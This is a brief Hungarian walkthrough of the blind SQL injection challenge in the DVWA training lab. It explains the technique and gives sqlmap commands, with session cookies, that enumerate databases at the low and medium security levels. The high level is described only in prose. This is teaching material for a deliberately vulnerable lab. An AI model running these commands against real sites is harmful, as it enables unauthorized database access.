SQL Injection Blind

1. Bevezetés¶

A Blind SQL Injection (vak SQL befecskendezés) az SQL injekciós támadás egy olyan formája, amikor a támadó nem kap közvetlen választ az adatbázis szervertől, amely megmutatná a manipuláció eredményét.

A vak SQL injekció során a támadó SQL parancsokat fecskendez be egy webalkalmazásba, hogy adatokat nyerjen ki az adatbázisból, de nem látja közvetlenül a támadás eredményét. Ehelyett tesztelési és elemzési technikákra kell hagyatkoznia, hogy megállapítsa, sikeres volt-e a támadás vagy sem.

2. Low Security Level (Alacsony biztonsági szint)¶

sqlmap -u 'http://buster/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit' -p id --cookie 'security=low; PHPSESSID=5c8siun1tr567gd519v1mivcbi' --dbs

3. Medium Security Level (Közepes biztonsági szint)¶

sqlmap -u 'http://buster/dvwa/vulnerabilities/sqli_blind/' --data 'id=1&Submit=Submit' --cookie 'security=medium; PHPSESSID=5c8siun1tr567gd519v1mivcbi' -p id --dbs

4. High Security Level (Magas biztonsági szint)¶

Ez a mód hasonló a hibaalapú (error-based) SQL injekció kihívás magas nehézségi szintjéhez. Az egyetlen különbség, hogy ez vak (blind) SQL injekció, vagyis itt nem kapunk közvetlen hibaüzeneteket vagy visszajelzést az adatbázistól.